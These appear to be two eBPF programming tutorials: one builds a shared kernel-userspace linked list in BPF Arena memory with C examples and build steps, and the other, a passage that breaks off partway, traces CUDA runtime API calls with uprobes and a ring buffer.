In-kernel data structures become practical. You can implement custom hash tables with collision chaining, AVL or red-black trees for sorted data, graphs for network topology mapping, all using normal pointer operations. Key-value store accelerators can run in the kernel for maximum performance, with userspace getting direct access to the data structure without syscall overhead. Bidirectional communication works naturally - both kernel and userspace can modify shared data structures using lock-free algorithms. Large data aggregation scales up to 4GB instead of being limited by typical map size constraints.

Implementation: Building a Linked List in Arena Memory

Let's build a complete example that demonstrates arena's power. We'll create a linked list where BPF programs add and delete elements using real pointers, while userspace directly accesses the list to compute sums without any syscalls.

Complete BPF Program: arena_list.bpf.c

// SPDX-License-Identifier: GPL-2.0
/* Copyright (c) 2024 Meta Platforms, Inc. and affiliates. */
#define BPF_NO_KFUNC_PROTOTYPES
#include <vmlinux.h>
#include <bpf/bpf_helpers.h>
#include <bpf/bpf_tracing.h>
#include <bpf/bpf_core_read.h>
#include "bpf_experimental.h"

struct {
    __uint(type, BPF_MAP_TYPE_ARENA);
    __uint(map_flags, BPF_F_MMAPABLE);
    __uint(max_entries, 100); /* number of pages */
#ifdef __TARGET_ARCH_arm64
    __ulong(map_extra, 0x1ull << 32); /* start of mmap() region */
#else
    __ulong(map_extra, 0x1ull << 44); /* start of mmap() region */
#endif
} arena SEC(".maps");

#include "bpf_arena_alloc.h"
#include "bpf_arena_list.h"

struct elem {
    struct arena_list_node node;
    __u64 value;
};

struct arena_list_head __arena *list_head;
int list_sum;
int cnt;
bool skip = false;

#ifdef __BPF_FEATURE_ADDR_SPACE_CAST
long __arena arena_sum;
int __arena test_val = 1;
struct arena_list_head __arena global_head;
#else
long arena_sum SEC(".addr_space.1");
int test_val SEC(".addr_space.1");
#endif

int zero;

SEC("syscall")
int arena_list_add(void *ctx)
{
#ifdef __BPF_FEATURE_ADDR_SPACE_CAST
    __u64 i;

    list_head = &global_head;

    for (i = zero; i < cnt && can_loop; i++) {
        struct elem __arena *n = bpf_alloc(sizeof(*n));

        test_val++;
        n->value = i;
        arena_sum += i;
        list_add_head(&n->node, list_head);
    }
#else
    skip = true;
#endif
    return 0;
}

SEC("syscall")
int arena_list_del(void *ctx)
{
#ifdef __BPF_FEATURE_ADDR_SPACE_CAST
    struct elem __arena *n;
    int sum = 0;

    arena_sum = 0;
    list_for_each_entry(n, list_head, node) {
        sum += n->value;
        arena_sum += n->value;
        list_del(&n->node);
        bpf_free(n);
    }
    list_sum = sum;
#else
    skip = true;
#endif
    return 0;
}

char _license[] SEC("license") = "GPL";

Understanding the BPF Code

The program starts by defining the arena map itself. BPF_MAP_TYPE_ARENA tells the kernel this is arena memory, and BPF_F_MMAPABLE makes it accessible via mmap() from userspace. The max_entries field specifies how many pages (typically 4KB each) the arena can hold - here we allow up to 100 pages, or about 400KB. The map_extra field sets where in the virtual address space the arena gets mapped, using different addresses for ARM64 vs x86-64 to avoid conflicts with existing mappings.
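The sizing arithmetic can be checked with a few lines of C. This is a back-of-the-envelope sketch, assuming the 4 GB address-space ceiling quoted earlier in the text; the function names are made up for illustration. Because max_entries is counted in pages, the byte size depends on the page size of the machine: 100 pages is 400 KiB with 4 KiB pages, but sixteen times that on a kernel built with 64 KiB pages.

```c
#include <assert.h>
#include <stdint.h>

#define ARENA_MAX_BYTES (1ull << 32) /* 4 GiB ceiling quoted in the text */

/* Bytes covered by an arena of the given number of pages. */
static uint64_t arena_bytes(uint32_t pages, uint32_t page_size)
{
    assert(page_size != 0);
    return (uint64_t)pages * page_size;
}

/* Largest max_entries value that stays within the 4 GiB ceiling. */
static uint64_t arena_max_pages(uint32_t page_size)
{
    assert(page_size != 0);
    return ARENA_MAX_BYTES / page_size;
}
```

For the map above, arena_bytes(100, 4096) gives 409600 bytes, which is the "about 400KB" figure.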

After defining the map, we include arena helpers. The bpf_arena_alloc.h file provides bpf_alloc() and bpf_free() functions - a simple memory allocator that works with arena pages, similar to malloc() and free() but specifically for arena memory. The bpf_arena_list.h file implements doubly-linked list operations using arena pointers, including list_add_head() to prepend nodes and list_for_each_entry() to iterate safely.

Our elem structure contains the actual data. The arena_list_node member provides the next and pprev pointers for linking nodes together - these are arena pointers marked with __arena. The value field holds our payload data. Notice the __arena annotation on list_head - this tells the verifier this pointer references arena memory, not normal kernel memory.
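To see why a node carries both next and pprev, it can help to model the list in ordinary user-space C. The sketch below is only a plain-C analogue with hypothetical model_ names. It omits the __arena annotation and the address-space casts, and it is not the code from bpf_arena_list.h. Because pprev stores the address of whichever pointer currently points at the node, deletion is O(1) and needs no special case for the first element.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Plain-C stand-ins for the arena list types (no __arena annotation). */
struct list_node {
    struct list_node *next;   /* following node, or NULL at the tail */
    struct list_node **pprev; /* address of the pointer that points at us */
};

struct list_head {
    struct list_node *first;
};

struct elem {
    struct list_node node;    /* kept first so node and elem share an address */
    uint64_t value;
};

/* Prepend n to the list in O(1). */
static void model_list_add_head(struct list_node *n, struct list_head *h)
{
    assert(n != NULL && h != NULL);
    n->next = h->first;
    if (h->first)
        h->first->pprev = &n->next;
    h->first = n;
    n->pprev = &h->first;
}

/* Unlink n in O(1) without needing the list head. */
static void model_list_del(struct list_node *n)
{
    assert(n != NULL && n->pprev != NULL);
    *n->pprev = n->next;
    if (n->next)
        n->next->pprev = n->pprev;
    n->next = NULL;
    n->pprev = NULL;
}

/* Walk the list and add up the payloads. */
static uint64_t model_list_sum(const struct list_head *h)
{
    uint64_t sum = 0;

    assert(h != NULL);
    for (const struct list_node *p = h->first; p; p = p->next)
        sum += ((const struct elem *)p)->value;
    return sum;
}
```

The arena version follows the same shape; the difference is that every pointer lives in arena address space, so the same nodes can be walked from both the BPF program and userspace.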

The arena_list_add() function creates list elements. It's marked SEC("syscall") because userspace will trigger it using bpf_prog_test_run_opts(). The loop allocates new elements using bpf_alloc(sizeof(*n)), which returns an arena pointer. We can then dereference n->value directly - the verifier allows this because n is an arena pointer. The list_add_head() call prepends the new node to the list using normal pointer manipulation, all happening in arena memory. The can_loop check satisfies the verifier's bounded loop requirement.

The arena_list_del() function demonstrates iteration and cleanup. The list_for_each_entry() macro walks the list following arena pointers. Inside the loop, we sum values and delete nodes. The bpf_free(n) call returns memory to the arena allocator, decreasing the reference count and potentially freeing pages when the count hits zero.

The address space cast feature is crucial. Clang defines __BPF_FEATURE_ADDR_SPACE_CAST when its BPF backend supports address space casts, which lets the __arena annotation work as a real compiler address space. Without this support, we fall back to explicit section annotations like SEC(".addr_space.1"), and both programs set skip = true instead of touching the list, so userspace can report the test as skipped rather than fail at runtime.

Complete User-Space Program: arena_list.c

// SPDX-License-Identifier: GPL-2.0
/* Copyright (c) 2024 Meta Platforms, Inc. and affiliates. */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/mman.h>
#include <stdint.h>
#include <bpf/libbpf.h>
#include <bpf/bpf.h>

#include "bpf_arena_list.h"
#include "arena_list.skel.h"

struct elem {
    struct arena_list_node node;
    uint64_t value;
};

static int list_sum(struct arena_list_head *head)
{
    struct elem __arena *n;
    int sum = 0;

    list_for_each_entry(n, head, node)
        sum += n->value;
    return sum;
}

static void test_arena_list_add_del(int cnt)
{
    LIBBPF_OPTS(bpf_test_run_opts, opts);
    struct arena_list_bpf *skel;
    int expected_sum = (uint64_t)cnt * (cnt - 1) / 2;
    int ret, sum;

    skel = arena_list_bpf__open_and_load();
    if (!skel) {
        fprintf(stderr, "Failed to open and load BPF skeleton\n");
        return;
    }

    skel->bss->cnt = cnt;
    ret = bpf_prog_test_run_opts(bpf_program__fd(skel->progs.arena_list_add), &opts);
    if (ret != 0) {
        fprintf(stderr, "Failed to run arena_list_add: %d\n", ret);
        goto out;
    }
    if (opts.retval != 0) {
        fprintf(stderr, "arena_list_add returned %d\n", opts.retval);
        goto out;
    }
    if (skel->bss->skip) {
        printf("SKIP: compiler doesn't support arena_cast\n");
        goto out;
    }
    sum = list_sum(skel->bss->list_head);
    printf("Sum of elements: %d (expected: %d)\n", sum, expected_sum);

    ret = bpf_prog_test_run_opts(bpf_program__fd(skel->progs.arena_list_del), &opts);
    if (ret != 0) {
        fprintf(stderr, "Failed to run arena_list_del: %d\n", ret);
        goto out;
    }
    sum = list_sum(skel->bss->list_head);
    printf("Sum after deletion: %d (expected: 0)\n", sum);
    printf("Sum computed by BPF: %d (expected: %d)\n", skel->bss->list_sum, expected_sum);

    printf("\nTest passed!\n");
out:
    arena_list_bpf__destroy(skel);
}

int main(int argc, char **argv)
{
    int cnt = 10;

    if (argc > 1) {
        cnt = atoi(argv[1]);
        if (cnt <= 0) {
            fprintf(stderr, "Invalid count: %s\n", argv[1]);
            return 1;
        }
    }

    printf("Testing arena list with %d elements\n", cnt);
    test_arena_list_add_del(cnt);

    return 0;
}

Understanding the User-Space Code

The userspace program demonstrates zero-copy access to arena memory. When we load the BPF skeleton using arena_list_bpf__open_and_load(), libbpf automatically mmap()s the arena into userspace. The pointer skel->bss->list_head points directly into this mapped arena memory.

The list_sum() function walks the linked list from userspace. Notice we're using the same list_for_each_entry() macro as the BPF code. The list is in arena memory, shared between kernel and userspace. Userspace can directly dereference arena pointers to access node values and follow next pointers - no syscalls needed. This is the zero-copy benefit: userspace reads memory directly from the mapped region.

The test flow orchestrates the demonstration. First, we set skel->bss->cnt to specify how many list elements to create. Then bpf_prog_test_run_opts() executes the arena_list_add BPF program, which builds the list in arena memory. Once that returns, userspace immediately calls list_sum() to verify the list by walking it directly from userspace - no syscalls, just direct memory access. The expected sum is calculated as 0+1+2+...+(cnt-1), which equals cnt*(cnt-1)/2.
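The closed form is easy to verify independently. The sketch below uses hypothetical helper names and is separate from the tutorial sources. It computes the expected sum in 64 bits, cross-checks it against a brute-force loop, and reports whether the result still fits in the plain int that the tutorial program uses. With 32-bit int the sum stops fitting once cnt exceeds 65536, which only matters if the arena is enlarged far beyond the 100 pages configured here.

```c
#include <assert.h>
#include <limits.h>
#include <stdint.h>

/* Closed form for 0 + 1 + ... + (cnt - 1), computed in 64 bits. */
static uint64_t expected_sum(uint32_t cnt)
{
    if (cnt == 0)
        return 0;
    return (uint64_t)cnt * (cnt - 1) / 2;
}

/* Brute-force sum, used only to cross-check the closed form. */
static uint64_t looped_sum(uint32_t cnt)
{
    uint64_t sum = 0;

    for (uint32_t i = 0; i < cnt; i++)
        sum += i;
    return sum;
}

/* Returns 1 when the sum still fits in a plain int. */
static int sum_fits_in_int(uint32_t cnt)
{
    assert(expected_sum(cnt) == looped_sum(cnt)); /* formula sanity check */
    return expected_sum(cnt) <= (uint64_t)INT_MAX;
}
```

For the runs shown later, expected_sum(10) is 45 and expected_sum(100) is 4950.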

After verifying the list, we run arena_list_del to remove all elements. This BPF program walks the list, computes its own sum, and calls bpf_free() on each node. Userspace then verifies the list is empty by calling list_sum() again, which should return 0. We also check that skel->bss->list_sum matches our expected value, confirming the BPF program computed the correct sum before deleting nodes.

Understanding Arena Memory Allocation

The arena allocator deserves a closer look because it shows how BPF programs can implement sophisticated memory management in arena space. The allocator in bpf_arena_alloc.h uses a per-CPU page fragment approach to avoid locking.

Each CPU maintains its own current page and offset. When you call bpf_alloc(size), it first rounds the size up to a multiple of 8 bytes. If the current page has enough room below the current offset, it allocates from there by simply decrementing the offset and returning a pointer. Otherwise it allocates a fresh page using bpf_arena_alloc_pages(), a kfunc (not a classic BPF helper) that backs arena pages with memory from the kernel's page allocator. Each page keeps a reference count in its last 8 bytes, tracking how many allocated objects live in that page.

The bpf_free(addr) function implements reference-counted deallocation. It rounds the address down to the page boundary, finds the reference count, and decrements it. When the count reaches zero - meaning all objects allocated from that page have been freed - it returns the entire page to the kernel using bpf_arena_free_pages(). This page-level reference counting means individual bpf_free() calls are fast, and memory is returned to the system only when appropriate.
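The allocation and free paths described above can be modelled in user space to make the bookkeeping concrete. The following is a simplified sketch, not the code from bpf_arena_alloc.h. It tracks a single CPU's state, uses aligned_alloc() and free() as stand-ins for bpf_arena_alloc_pages() and bpf_arena_free_pages(), and all model_ names are hypothetical. As an extra safety step for user space, it also forgets the current page once that page has been released.

```c
#include <assert.h>
#include <stdint.h>
#include <stdlib.h>

#define PAGE_SZ 4096u
#define CNT_SZ  8u   /* refcount lives in the last 8 bytes of each page */

static unsigned char *cur_page;  /* page currently being carved up */
static unsigned int cur_offset;  /* the next allocation ends here */
static int pages_live;           /* pages obtained and not yet released */

static uint64_t *page_refcnt(unsigned char *page)
{
    return (uint64_t *)(page + PAGE_SZ - CNT_SZ);
}

/* Carve size bytes (rounded up to 8) from the top of the current page. */
static void *model_alloc(unsigned int size)
{
    size = (size + 7u) & ~7u;
    if (size == 0 || size > PAGE_SZ - CNT_SZ)
        return NULL;
    if (!cur_page || cur_offset < size) {
        /* stand-in for bpf_arena_alloc_pages(): one page-aligned page */
        unsigned char *page = aligned_alloc(PAGE_SZ, PAGE_SZ);

        if (!page)
            return NULL;
        *page_refcnt(page) = 0;
        cur_page = page;
        cur_offset = PAGE_SZ - CNT_SZ;
        pages_live++;
    }
    cur_offset -= size;
    (*page_refcnt(cur_page))++;
    return cur_page + cur_offset;
}

/* Drop one reference; release the page when its last object is freed. */
static void model_free(void *addr)
{
    unsigned char *page;

    assert(addr != NULL);
    page = (unsigned char *)((uintptr_t)addr & ~(uintptr_t)(PAGE_SZ - 1));
    if (--(*page_refcnt(page)) == 0) {
        if (page == cur_page)
            cur_page = NULL;  /* do not keep carving a released page */
        free(page);           /* stand-in for bpf_arena_free_pages() */
        pages_live--;
    }
}
```

Allocating three 24-byte objects in this model places them back to back at the top of one page, and the page is released only when the third one is freed, which is the behaviour the reference count is designed to give.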

This allocator design avoids locks by using per-CPU state. A BPF program is not migrated to another CPU while it runs, so it can use the current CPU's page fragment without synchronization. This makes bpf_alloc() extremely fast - typically just a few instructions to allocate from the current page.

Compilation and Execution

Navigate to the bpf_arena directory and build the example:

cd bpf-developer-tutorial/src/features/bpf_arena
make

The Makefile compiles the BPF program with -D__BPF_FEATURE_ADDR_SPACE_CAST to enable arena pointer support. It uses bpftool gen object to process the compiled BPF object and generate a skeleton header that userspace can include.

Run the arena list test with 10 elements:

sudo ./arena_list 10

Expected output:

Testing arena list with 10 elements
Sum of elements: 45 (expected: 45)
Sum after deletion: 0 (expected: 0)
Sum computed by BPF: 45 (expected: 45)

Test passed!

Try it with more elements to see arena scaling:

sudo ./arena_list 100

The sum should be 4950 (100*99/2). Notice that userspace can verify the list by directly accessing arena memory without any syscalls. This zero-copy access is what makes arena powerful for large data structures.

When to Use Arena vs Other BPF Maps

Choosing the right BPF map type depends on your access patterns and data structure needs. Use regular BPF maps (hash, array, etc.) when you need simple key-value storage, small data structures that fit well in maps, standard map operations like atomic updates, or per-CPU statistics without complex linking. Maps excel at straightforward use cases with kernel-provided operations.

Use BPF Arena when you need complex linked structures like lists, trees, or graphs, large shared memory exceeding typical map sizes, zero-copy userspace access to avoid syscall overhead, or custom memory management beyond what maps provide. Arena shines for sophisticated data structures where pointer operations are natural.

Use Ring Buffers when you need one-way streaming from BPF to userspace, event logs or trace data, or sequentially processed data without random access. Ring buffers are optimized for high-throughput event streams but don't support bidirectional access or complex data structures.

The arena vs maps trade-off fundamentally comes down to pointers and access patterns. If you find yourself encoding indices to simulate pointers in BPF maps, arena is probably the better choice. If you need large-scale data structures accessible from both kernel and userspace, arena's zero-copy shared memory model is hard to beat.

Summary and Next Steps

BPF Arena solves a fundamental limitation of traditional BPF maps by providing sparse shared memory where you can use real C pointers to build complex data structures. Created by Alexei Starovoitov in 2024, arena enables linked lists, trees, graphs, and custom allocators using normal pointer operations instead of awkward integer indices. Both kernel BPF programs and userspace can map the same arena for zero-copy bidirectional access, eliminating syscall overhead.

Our linked list example demonstrates the core arena concepts: defining an arena map, using __arena annotations for pointer types, allocating memory with bpf_alloc(), and accessing the same data structure from both kernel and userspace. The per-CPU page fragment allocator shows how BPF programs can implement sophisticated memory management in arena space. Arena unlocks new possibilities for in-kernel data structures, key-value store accelerators, and large-scale data aggregation up to 4GB.

If you'd like to dive deeper into eBPF, check out our tutorial repository at https://github.com/eunomia-bpf/bpf-developer-tutorial or visit our website at https://eunomia.dev/tutorials/.

References

Original Arena Patches: https://lwn.net/Articles/961594/
Meta's Arena Examples: Linux kernel tree samples/bpf/arena_*.c
Tutorial Repository: https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/features/bpf_arena
Linux Kernel Source: kernel/bpf/arena.c - Arena implementation
LLVM Address Spaces: Documentation on __arena compiler support

This example is adapted from Meta's arena_list.c in the Linux kernel samples, with educational enhancements. Requires Linux kernel 6.10+ with CONFIG_BPF_ARENA=y enabled. Complete source code available in the tutorial repository.

eBPF Tutorial: Tracing CUDA GPU Operations

云微 — Tue, 30 Dec 2025 07:16:43 +0000

Have you ever wondered what's happening under the hood when your CUDA application is running? GPU operations can be challenging to debug and profile because they happen in a separate device with its own memory space. In this tutorial, we'll build a powerful eBPF-based tracing tool that lets you peek into CUDA API calls in real time.

The complete source code: https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/47-cuda-events

Introduction to CUDA and GPU Tracing

CUDA (Compute Unified Device Architecture) is NVIDIA's parallel computing platform and programming model that enables developers to use NVIDIA GPUs for general-purpose processing. A typical CUDA application follows five steps: the host (CPU) allocates memory on the device (GPU), copies input data from host memory to device memory, launches GPU kernels (functions) to process the data, copies the results back from device to host, and finally frees the device memory.

Each operation in this process involves CUDA API calls, such as cudaMalloc for memory allocation, cudaMemcpy for data transfer, and cudaLaunchKernel for kernel execution. Tracing these calls can provide valuable insights for debugging and performance optimization, but this isn't straightforward. GPU operations are asynchronous, meaning the CPU can continue executing after submitting work to the GPU without waiting, and traditional debugging tools often can't penetrate this asynchronous boundary to access GPU internal state.

This is where eBPF comes to the rescue! By using uprobes, we can intercept CUDA API calls in the user-space CUDA runtime library (libcudart.so) before they reach the GPU driver, capturing critical information. This approach allows us to gain deep insights into memory allocation sizes and patterns, data transfer directions and volumes, kernel launch parameters, error codes and failure reasons returned by the API, and precise timing information for each operation. By intercepting these calls on the CPU side, we can build a complete view of an application's GPU usage behavior without modifying application code or relying on proprietary profiling tools.

This tutorial primarily focuses on CPU-side CUDA API tracing, which provides a macro view of how applications interact with the GPU. However, CPU-side tracing alone has clear limitations. When a CUDA API function like cudaLaunchKernel is called, it merely submits a work request to the GPU. We can see when the kernel was launched, but we cannot observe what actually happens inside the GPU. Critical details such as how thousands of threads access memory, their execution patterns, branching behavior, and synchronization operations remain invisible. These details are crucial for understanding performance bottlenecks, such as whether memory accesses fail to coalesce or whether severe thread divergence reduces execution efficiency.

To achieve fine-grained tracing of GPU operations, eBPF programs need to run directly on the GPU. This is exactly what the eGPU paper and bpftime GPU examples explore. bpftime converts eBPF programs into PTX instructions that GPUs can execute, then dynamically modifies CUDA binaries at runtime to inject these eBPF programs at kernel entry and exit points, enabling observation of GPU internal behavior. This approach allows developers to access GPU-specific information such as block indices, thread indices, global timers, and perform measurements and tracing on critical paths during kernel execution. This GPU-internal observability is essential for diagnosing complex performance issues, understanding kernel execution behavior, and optimizing GPU computation—capabilities that CPU-side tracing simply cannot provide.

Key CUDA Functions We Trace

Our tracer monitors several critical CUDA functions that represent the main operations in GPU computing. Understanding these functions helps you interpret the tracing results and diagnose issues in your CUDA applications:

Memory Management

cudaMalloc: Allocates memory on the GPU device. By tracing this, we can see how much memory is being requested, when, and whether it succeeds. Memory allocation failures are a common source of problems in CUDA applications.

  cudaError_t cudaMalloc(void** devPtr, size_t size);

cudaFree: Releases previously allocated memory on the GPU. Tracing this helps identify memory leaks (allocated memory that's never freed) and double-free errors.

  cudaError_t cudaFree(void* devPtr);

Data Transfer

cudaMemcpy: Copies data between host (CPU) and device (GPU) memory, or between different locations in device memory. The direction parameter (kind) tells us whether data is moving to the GPU, from the GPU, or within the GPU.

  cudaError_t cudaMemcpy(void* dst, const void* src, size_t count, cudaMemcpyKind kind);

The kind parameter can be:

cudaMemcpyHostToDevice (1): Copying from CPU to GPU
cudaMemcpyDeviceToHost (2): Copying from GPU to CPU
cudaMemcpyDeviceToDevice (3): Copying within GPU memory
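Since the tracer sees kind as a bare integer, a small lookup helper can make the output easier to read. The sketch below is an assumption for illustration and is not part of the tutorial's source: memcpy_kind_str and format_memcpy_details are hypothetical names. The numeric values follow enum cudaMemcpyKind in the CUDA runtime headers, which also defines cudaMemcpyHostToHost (0) and cudaMemcpyDefault (4) in addition to the three values listed above.

```c
#include <assert.h>
#include <stddef.h>
#include <stdio.h>

/* Hypothetical helper: map the raw cudaMemcpyKind value to a label. */
static const char *memcpy_kind_str(int kind)
{
    switch (kind) {
    case 0:  return "HostToHost";
    case 1:  return "HostToDevice";
    case 2:  return "DeviceToHost";
    case 3:  return "DeviceToDevice";
    case 4:  return "Default";  /* direction inferred from the pointer values */
    default: return "Unknown";
    }
}

/* Hypothetical helper: build a details string for a memcpy entry event.
 * Returns the value of snprintf (the length the full string needs). */
static int format_memcpy_details(char *out, size_t len, size_t size, int kind)
{
    assert(out != NULL && len > 0);
    return snprintf(out, len, "size=%zu bytes, kind=%s",
                    size, memcpy_kind_str(kind));
}
```

With a helper like this, a memcpy event could be reported as kind=HostToDevice instead of kind=1.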

Kernel Execution

cudaLaunchKernel: Launches a GPU kernel (function) to run on the device. This is where the actual parallel computation happens. Tracing this shows when kernels are launched and whether they succeed.

  cudaError_t cudaLaunchKernel(const void* func, dim3 gridDim, dim3 blockDim, 
                              void** args, size_t sharedMem, cudaStream_t stream);

Streams and Synchronization

CUDA uses streams for managing concurrency and asynchronous operations:

cudaStreamCreate: Creates a new stream for executing operations in order but potentially concurrently with other streams.

  cudaError_t cudaStreamCreate(cudaStream_t* pStream);

cudaStreamSynchronize: Waits for all operations in a stream to complete. This is a key synchronization point that can reveal performance bottlenecks.

  cudaError_t cudaStreamSynchronize(cudaStream_t stream);

Events

CUDA events are used for timing and synchronization:

cudaEventCreate: Creates an event object for timing operations.

  cudaError_t cudaEventCreate(cudaEvent_t* event);

cudaEventRecord: Records an event in a stream, which can be used for timing or synchronization.

  cudaError_t cudaEventRecord(cudaEvent_t event, cudaStream_t stream);

cudaEventSynchronize: Waits for an event to complete, which is another synchronization point.

  cudaError_t cudaEventSynchronize(cudaEvent_t event);

Device Management

cudaGetDevice: Gets the current device being used.

  cudaError_t cudaGetDevice(int* device);

cudaSetDevice: Sets the device to be used for GPU executions.

  cudaError_t cudaSetDevice(int device);

By tracing these functions, we gain visibility into the host-side lifecycle of GPU operations, from device selection and memory allocation to data transfer, kernel launch, and synchronization. This enables us to identify bottlenecks, diagnose errors, and understand the behavior of CUDA applications.

Architecture Overview

Our CUDA events tracer consists of three main components:

Header File (cuda_events.h): Defines data structures for communication between kernel and user space
eBPF Program (cuda_events.bpf.c): Implements kernel-side hooks for CUDA functions using uprobes
User-Space Application (cuda_events.c): Loads the eBPF program, processes events, and displays them to the user

The tool uses eBPF uprobes to attach to CUDA API functions in the CUDA runtime library. When a CUDA function is called, the eBPF program captures the parameters and results, sending them to user space through a ring buffer.

Key Data Structures

The central data structure for our tracer is the struct event defined in cuda_events.h:

struct event {
    /* Common fields */
    int pid;                  /* Process ID */
    char comm[TASK_COMM_LEN]; /* Process name */
    enum cuda_event_type type;/* Type of CUDA event */

    /* Event-specific data (union to save space) */
    union {
        struct { size_t size; } mem;                 /* For malloc */
        struct { void *ptr; } free_data;             /* For free */
        struct { size_t size; int kind; } memcpy_data; /* For memcpy */
        struct { void *func; } launch;               /* For kernel launch */
        struct { int device; } device;               /* For device operations */
        struct { void *handle; } handle;             /* For stream/event operations */
    };

    bool is_return;           /* True if this is from a return probe */
    int ret_val;              /* Return value (for return probes) */
    char details[MAX_DETAILS_LEN]; /* Additional details as string */
};

This structure is designed to efficiently capture information about different types of CUDA operations. The union is a clever space-saving technique since each event only needs one type of data at a time. For example, a memory allocation event needs to store the size, while a free event needs to store a pointer.
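The space saving can be checked directly with sizeof. The sketch below copies the payload members from struct event into a named union and compares it with a hypothetical "flat" layout that stores every member side by side. The names event_payload, event_payload_flat, payload_union_size and payload_flat_size are made up for this illustration.

```c
#include <assert.h>
#include <stddef.h>

/* The payload members as declared in the tutorial's struct event,
 * pulled out into a named union so it can be measured. */
union event_payload {
    struct { size_t size; } mem;
    struct { void *ptr; } free_data;
    struct { size_t size; int kind; } memcpy_data;
    struct { void *func; } launch;
    struct { int device; } device;
    struct { void *handle; } handle;
};

/* Hypothetical alternative: the same members without a union. */
struct event_payload_flat {
    struct { size_t size; } mem;
    struct { void *ptr; } free_data;
    struct { size_t size; int kind; } memcpy_data;
    struct { void *func; } launch;
    struct { int device; } device;
    struct { void *handle; } handle;
};

/* The union can never be larger than the side-by-side layout. */
static_assert(sizeof(union event_payload) <= sizeof(struct event_payload_flat),
              "union must not be larger than the flat layout");

static size_t payload_union_size(void)
{
    return sizeof(union event_payload);
}

static size_t payload_flat_size(void)
{
    return sizeof(struct event_payload_flat);
}
```

The union is only as large as its biggest member (memcpy_data here). On a typical x86-64 Linux build that should be 16 bytes against 56 for the flat layout; other ABIs will give different numbers. Because every event reserves a full struct event in the ring buffer, the saving applies to each traced call.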

The cuda_event_type enum helps us categorize different CUDA operations:

enum cuda_event_type {
    CUDA_EVENT_MALLOC = 0,
    CUDA_EVENT_FREE,
    CUDA_EVENT_MEMCPY,
    CUDA_EVENT_LAUNCH_KERNEL,
    CUDA_EVENT_STREAM_CREATE,
    CUDA_EVENT_STREAM_SYNC,
    CUDA_EVENT_GET_DEVICE,
    CUDA_EVENT_SET_DEVICE,
    CUDA_EVENT_EVENT_CREATE,
    CUDA_EVENT_EVENT_RECORD,
    CUDA_EVENT_EVENT_SYNC
};

This enum covers the main CUDA operations we want to trace, from memory management to kernel launches and synchronization.

The eBPF Program Implementation

Let's dive into the eBPF program (cuda_events.bpf.c) that hooks into CUDA functions. The full code is available in the repository, but here are the key parts:

First, we create a ring buffer to communicate with user space:

struct {
    __uint(type, BPF_MAP_TYPE_RINGBUF);
    __uint(max_entries, 256 * 1024);
} rb SEC(".maps");

The ring buffer is a crucial component for our tracer. It acts as a high-performance queue where the eBPF program can submit events, and the user-space application can retrieve them. We set a generous size of 256KB to absorb bursts of events. If the buffer does fill up, bpf_ringbuf_reserve returns NULL and that event is dropped rather than blocking the traced application.

For each CUDA operation, we implement a helper function to collect relevant data. Let's look at the submit_malloc_event function as an example:

static inline int submit_malloc_event(size_t size, bool is_return, int ret_val) {
    struct event *e = bpf_ringbuf_reserve(&rb, sizeof(*e), 0);
    if (!e) return 0;

    /* Fill common fields */
    e->pid = bpf_get_current_pid_tgid() >> 32;
    bpf_get_current_comm(&e->comm, sizeof(e->comm));
    e->type = CUDA_EVENT_MALLOC;
    e->is_return = is_return;

    /* Fill event-specific data */
    if (is_return) {
        e->ret_val = ret_val;
    } else {
        e->mem.size = size;
    }

    bpf_ringbuf_submit(e, 0);
    return 0;
}

This function first reserves space in the ring buffer for our event. Then it fills in common fields like the process ID and name. For a malloc event, we store either the requested size (on function entry) or the return value (on function exit). Finally, we submit the event to the ring buffer.

The actual probes are attached to CUDA functions using SEC annotations. For cudaMalloc, we have:

SEC("uprobe")
int BPF_KPROBE(cuda_malloc_enter, void **ptr, size_t size) {
    return submit_malloc_event(size, false, 0);
}

SEC("uretprobe")
int BPF_KRETPROBE(cuda_malloc_exit, int ret) {
    return submit_malloc_event(0, true, ret);
}

The first function is called when cudaMalloc is entered, capturing the requested size. The second is called when cudaMalloc returns, capturing the error code. This pattern is repeated for each CUDA function we want to trace.

One interesting case is cudaMemcpy, which transfers data between host and device:

SEC("uprobe")
int BPF_KPROBE(cuda_memcpy_enter, void *dst, const void *src, size_t size, int kind) {
    return submit_memcpy_event(size, kind, false, 0);
}

Here, we capture not just the size but also the "kind" parameter, which indicates the direction of the transfer (host-to-device, device-to-host, or device-to-device). This gives us valuable information about data movement patterns.

User-Space Application Details

The user-space application (cuda_events.c) is responsible for loading the eBPF program, processing events from the ring buffer, and displaying them in a user-friendly format.

First, the program parses command-line arguments to configure its behavior:

static struct env {
    bool verbose;
    bool print_timestamp;
    char *cuda_library_path;
    bool include_returns;
    int target_pid;
} env = {
    .print_timestamp = true,
    .include_returns = true,
    .cuda_library_path = NULL,
    .target_pid = -1,
};

This structure stores configuration options like whether to print timestamps or include return probes. The default values provide a sensible starting point.

The program uses libbpf to load and attach the eBPF program to CUDA functions:

int attach_cuda_func(struct cuda_events_bpf *skel, const char *lib_path, 
                    const char *func_name, struct bpf_program *prog_entry,
                    struct bpf_program *prog_exit) {
    /* func_name lets libbpf resolve the symbol's offset inside lib_path */
    LIBBPF_OPTS(bpf_uprobe_opts, uprobe_opts, .func_name = func_name);

    /* Attach entry uprobe */
    if (prog_entry) {
        struct bpf_link *link = bpf_program__attach_uprobe_opts(prog_entry, 
                                env.target_pid, lib_path, 0, &uprobe_opts);
        /* Error handling... */
    }

    /* Attach exit uprobe */
    if (prog_exit) {
        /* retprobe = true turns the attachment into a uretprobe */
        uprobe_opts.retprobe = true;
        /* Similar for return probe... */
    }

    return 0;
}

This function takes a function name (like "cudaMalloc") and the corresponding eBPF programs for entry and exit. It then attaches these programs as uprobes to the specified library.

One of the most important functions is handle_event, which processes events from the ring buffer:

static int handle_event(void *ctx, void *data, size_t data_sz) {
    const struct event *e = data;
    struct tm *tm;
    char ts[32];
    char details[MAX_DETAILS_LEN];
    time_t t;

    /* Skip return probes if requested */
    if (e->is_return && !env.include_returns)
        return 0;

    time(&t);
    tm = localtime(&t);
    strftime(ts, sizeof(ts), "%H:%M:%S", tm);

    get_event_details(e, details, sizeof(details));

    if (env.print_timestamp) {
        printf("%-8s ", ts);
    }

    printf("%-16s %-7d %-20s %8s %s\n", 
           e->comm, e->pid, 
           event_type_str(e->type),
           e->is_return ? "[EXIT]" : "[ENTER]",
           details);

    return 0;
}

